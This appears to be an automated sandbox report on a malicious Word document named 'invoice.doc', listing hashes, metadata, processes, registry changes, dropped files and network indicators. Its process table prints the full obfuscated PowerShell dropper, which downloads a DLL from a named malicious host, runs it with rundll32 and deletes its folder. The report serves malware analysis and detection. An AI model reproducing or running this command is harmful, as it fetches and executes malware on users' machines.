File name: | invoice.doc |
Full analysis: | https://app.any.run/tasks/069880d3-50de-4965-bfab-aed9de17cc1f |
Verdict: | Malicious activity |
Analysis date: | November 08, 2018, 09:35:02 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: James Smith, Template: Normal.dotm, Last Saved By: Windows User, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Sun Nov 4 19:24:00 2018, Last Saved Time/Date: Wed Nov 7 02:32:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | 1374457044433A7AD196C1E43ACB15C1 |
SHA1: | 98DC8E8DE4C6EC1E0F39331C68B2E89C8E86F6EE |
SHA256: | B84E2524F59F318D5F8BD01B4CCC38FBD691F382873892D5304D760FAF0064C7 |
SSDEEP: | 6144:vTGfXFMFu9mycXxnBWbtzcn3lgO4VoX9B38Js+:b41SyqxnBWb5cVgZaXv8 |
.doc | | | Microsoft Word document (80) |
---|
CompObjUserType: | ???????? Microsoft Office Word 97-2003 |
---|---|
CompObjUserTypeLen: | 39 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 12 |
CharCountWithSpaces: | 1 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Cyrillic |
Security: | None |
Characters: | 1 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2018:11:07 02:32:00 |
CreateDate: | 2018:11:04 19:24:00 |
TotalEditTime: | 1.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 3 |
LastModifiedBy: | Windows User |
Template: | Normal.dotm |
Keywords: | - |
Author: | James Smith |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2916 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\invoice.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
700 | "C:\Users\admin\AppData\Local\Temp\qgnrahnui3\chaua.exe" $egabmypniujouovq6='ui3''';$tgvlrpmueqmvflyoaiwf='path=($en';$yeaeeaujsosbuua1=';Se';$eqkzlkejvawpqpqifkaydwuyeda='org/Xk';$ndojlceoiuoierjerlaqgmby='t System';$cahaaiilusephaohps05='php'',f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$ouboyaeuycah='t-Execu';$gyvouelayafgarddzy1='ss; f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$aobdseetzparmarmuuwf='''\z';$baaxslplaidrvehoqaymk60='cy By';$bvfrepnjwjpusrjjrwiaoffsu='hwh';$euukejdtncnqojxaoi='.dll'');';$ooqqbuoifbiiy='dFile(';$qwlofnexwuaouioaufbw='data+';$btouqdroaktfhyqgpuyyy='.Web';$fbrnyieyuiauiz='pass -Sc';$icfraektfrylkacqgwzrgfmvmzn82='rahn';$pjblncsnvyllrba25='qQkPWluO.';$wyssfngydmdwbpbsmk='prime';$uvfhheooqeaztoeg='l32 $p';$emnhxakhvharrqeobntmjkoyijq='path);';$yyvjvzbdtjnzclrpwsbswryupx='tionPoli';$yeozwuhayiomqagwja0='Downloa';$qrrflzpgijzpwkbnfktoke='(New-Ob';$znrxaxsebqjulaixhoukvxu7='Item ';$yrmeeeisxltkamiaaltb='''http://';$ioynehfvdkjqjeocmbovrs='se -for';$vtuiqqbukzaurcups1='vyeo';$urllsrgiczilzrboaetgsxhknlp='client).';$kbyowbudphqaoulhuesjjtyls='.Net';$vgnynvatppveuey60='fhj''';$alcpfemwsvbctgtlmlajfuiuyeq='ath , ''';$yjuuicgzcweoiut='f1'';Rem';$yyvcnzapjqjfxndzlldwattao='p + ''\qgn';$akouyyojompjrab='($env:tem';$mrdpdblcakqfyuydixminu05='$hj = ''';$zoflvqquooeyzilbiiqpouzlo=') -recur';$uerehhhpiebylwuauia='ove-';$micvzqjnkskthioyoskdqo='timer.';$rbkdlyuoterlqhiutjloe='v:app';$otruaanwcoaxmsxp=' rundl';$pxilntduusvjguyabvodpy='ope Proce';$aeaktrrowacvjlzyabew='ce;';$iaolcifsdafiuoesiyj='jec'; Invoke-Expression ($mrdpdblcakqfyuydixminu05+$bvfrepnjwjpusrjjrwiaoffsu+$vgnynvatppveuey60+$yeaeeaujsosbuua1+$ouboyaeuycah+$yyvjvzbdtjnzclrpwsbswryupx+$baaxslplaidrvehoqaymk60+$fbrnyieyuiauiz+$pxilntduusvjguyabvodpy+$gyvouelayafgarddzy1+$tgvlrpmueqmvflyoaiwf+$rbkdlyuoterlqhiutjloe+$qwlofnexwuaouioaufbw+$aobdseetzparmarmuuwf+$vtuiqqbukzaurcups1+$euukejdtncnqojxaoi+$qrrflzpgijzpwkbnfktoke+$iaolcifsdafiuoesiyj+$ndojlceoiuoierjerlaqgmby+$kbyowbudphqaoulhuesjjtyls+$btouqdroaktfhyqgpuyyy+$urllsrgiczilzrboaetgsxhknlp+$yeozwuhayiomqagwja0+$ooqqbuoifbiiy+$yrmeeeisxltkamiaaltb+$wyssfngydmdwbpbsmk+$micvzqjnkskthioyoskdqo+$eqkzlkejvawpqpqifkaydwuyeda+$pjblncsnvyllrba25+$cahaaiilusephaohps05+$emnhxakhvharrqeobntmjkoyijq+$otruaanwcoaxmsxp+$uvfhheooqeaztoeg+$alcpfemwsvbctgtlmlajfuiuyeq+$yjuuicgzcweoiut+$uerehhhpiebylwuauia+$znrxaxsebqjulaixhoukvxu7+$akouyyojompjrab+$yyvcnzapjqjfxndzlldwattao+$icfraektfrylkacqgwzrgfmvmzn82+$egabmypniujouovq6+$zoflvqquooeyzilbiiqpouzlo+$ioynehfvdkjqjeocmbovrs+$aeaktrrowacvjlzyabew); | C:\Users\admin\AppData\Local\Temp\qgnrahnui3\chaua.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1684 | "C:\Windows\system32\rundll32.exe" C:\Users\admin\AppData\Roaming\zvyeo.dll f1 | C:\Windows\system32\rundll32.exe | — | chaua.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | (#l |
Value: 28236C00640B0000010000000000000000000000 | |||
(PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1298661391 | |||
(PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1298661504 | |||
(PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1298661505 | |||
(PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: 640B00005A1E5A624677D40100000000 | |||
(PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | n$l |
Value: 6E246C00640B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | n$l |
Value: 6E246C00640B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2916) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2916 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA728.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2916 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Diagnostics.Format.ps1xml | text | |
MD5:FF6EEB8125B9265C5BA40AF9F7C6F6BC | SHA256:7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689 | |||
2916 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\invoice.doc.LNK | lnk | |
MD5:774B77253443BF68292397B4257E3C33 | SHA256:5C64C7624437F2B34D6D786E5D5913ADDD6B62D8C1187229FC4FBFF748643530 | |||
2916 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:7B84A1B98D4FA5D7D8643C8E5C2240CD | SHA256:E703AC9516525A41B7C1FAE95753B8F4EE2B37E5ACE99A9A18589F040AE7AEFB | |||
2916 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\qgnrahnui3\DotNetTypes.format.ps1xml | xml | |
MD5:1AB2FD4B6749AD6831C86411FDCAFB48 | SHA256:98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF | |||
2916 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\qgnrahnui3\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll | executable | |
MD5:A84B6952AB6A297CCE6C085FA8AB06CB | SHA256:54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D | |||
2916 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Certificate.format.ps1xml | xml | |
MD5:C93A361112351B30E2C959E72789952D | SHA256:4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D | |||
2916 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:8CB2D1BCE7DE3585DC8A41170F08FF04 | SHA256:4C13169CFA4154F5B440238020681E44D341C386D842BFCAE3A5CBD903356D51 | |||
2916 | WINWORD.EXE | C:\Users\admin\Desktop\~$nvoice.doc | pgc | |
MD5:3F911E6D8515D8D512CE9B2C8D8C5A2E | SHA256:CFE914353EA42FAA8BBD49A23E7897B23A2E7CF205FF581EF1DB4BFE93924B6C | |||
2916 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Command_Syntax.help.txt | text | |
MD5:847B0C3A6010660492ECC1D88A69210D | SHA256:7D7EE4469AE76392317DC7E16E716B5767BD7EEFCDC39F60C51ED1DA2E99AE2B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
700 | chaua.exe | GET | — | 77.85.38.18:80 | http://primetimer.org/XkqQkPWluO.php | BG | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
700 | chaua.exe | 77.85.38.18:80 | primetimer.org | Vivacom | BG | unknown |
Domain | IP | Reputation |
---|---|---|
primetimer.org |
| malicious |